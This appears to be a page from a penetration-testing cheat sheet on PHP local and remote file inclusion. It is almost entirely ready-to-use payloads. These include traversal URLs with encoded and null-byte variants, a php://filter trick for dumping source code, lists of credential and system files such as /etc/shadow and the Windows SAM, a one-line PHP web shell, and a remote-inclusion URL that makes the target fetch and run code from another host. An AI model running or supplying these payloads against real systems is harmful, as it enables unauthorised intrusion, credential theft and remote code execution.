Lockdoor Framework

A Penetration Testing Framework

View on GitHub

File Inclusion Vulnerabilities

There is a Python tool called fimap which can be leveraged to automate the exploitation of LFI/RFI vulnerabilities that are found in PHP (sqlmap for LFI): (https://github.com/kurobeats/fimap)

  If a phpinfo() file is present, it’s usually possible to get a shell, if you don’t know the location of the phpinfo file fimap can probe for it, or you could use a tool like OWASP DirBuster.

>include("lang/".$\_COOKIE\['lang'\]);

include($\_GET\['page'\].".php");
>curl -s \

"http://$ip/?page=<php://filter/convert.base64-encode/resource=index>" \

| grep -e '\\[^\\ \\]\\{40,\\}' | base64 -d
>http://$ip/index.php?page=<php://filter/convert.base64-encode/resource=admin.php>
>/etc/issue

/proc/version

/etc/profile

/etc/passwd

/etc/passwd

/etc/shadow

/root/.bash_history

/var/log/dmessage

/var/mail/root

/var/spool/cron/crontabs/root
>%SYSTEMROOT%\\repair\\system

%SYSTEMROOT%\\repair\\SAM

%SYSTEMROOT%\\repair\\SAM

%WINDIR%\\win.ini

%SYSTEMDRIVE%\\boot.ini

%WINDIR%\\Panther\\sysprep.inf

%WINDIR%\\system32\\config\\AppEvent.Evt
>/etc/fstab

/etc/master.passwd

/etc/resolv.conf

/etc/sudoers

/etc/sysctl.conf
>http://$ip/index.php?page=/etc/passwd

http://$ip/index.php?file=../../../../etc/passwd
>http://$ip/index.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd
>GET /addguestbook.php?name=Haxor&comment=Merci!&LANG=../../../../../../../windows/system32/drivers/etc/hosts%00
><?php echo shell\_exec($\_GET\['cmd'\]);?>

include($\_REQUEST\["file"\].".php");


Remote File Inclusion

>http://192.168.11.35/addguestbook.php?name=a&comment=b&LANG=http://192.168.10.5/evil.txt  

<?php echo shell_exec("ipconfig");?>